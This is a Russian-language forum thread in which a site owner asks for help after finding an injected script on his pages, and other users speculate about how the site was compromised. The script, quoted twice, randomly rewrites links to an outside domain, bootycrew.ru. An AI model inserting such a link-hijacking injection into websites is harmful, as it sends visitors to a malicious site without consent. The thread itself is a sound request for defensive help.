Такого взлома не встречал... обратится к программистам said

код ссылки подставляет http://xxx.bootycrew.ru/xxx.php если открыть просмотр html то видно

<script>window.onload = function() { let linkz = document.getElementsByTagName("a"); for(let i = 0; i < linkz.length; i++) { if(Math.floor(Math.random() * 100) < 35) { linkz[i].href="http://xxx.bootycrew.ru/xxx.php"; } } }</script>

внизу.

админы хоста сказали обратится к программистам! Ребята кто-то встречал подобное? Взлома на сервере нету... как-то кто-то прошил коды... Что-нибудь кто-нибудь сказать может?

MlP писал:

Взлома на сервере нету..

первое что нужно сделать, это абьюз хостеру.

Magistrator: думаешь хостеры?

MlP писал:

админы хоста сказали обратится к программистам! Ребята кто-то встречал подобное? Взлома на сервере нету... как-то кто-то прошил коды... Что-нибудь кто-нибудь сказать может?

Почему ты решил, что взлома нет? Может быть через скрипты на сервере и взломали твой сайт.

Админы имели ввиду, что у тебя дырка в софте кастомном твоем.

MlP писал:

<script>window.onload = function() { let linkz = document.getElementsByTagName("a"); for(let i = 0; i < linkz.length; i++) { if(Math.floor(Math.random() * 100) < 35) { linkz[i].href="http://xxx.bootycrew.ru/xxx.php"; } } }</script>

Взломщики твоего сервера даже не парятся с тем, чтобы спрятать свои инъекции. Обычно такое прячут и кодируют хотя бы от посторонних глаз
P.S. Буран не используешь на своем серваке?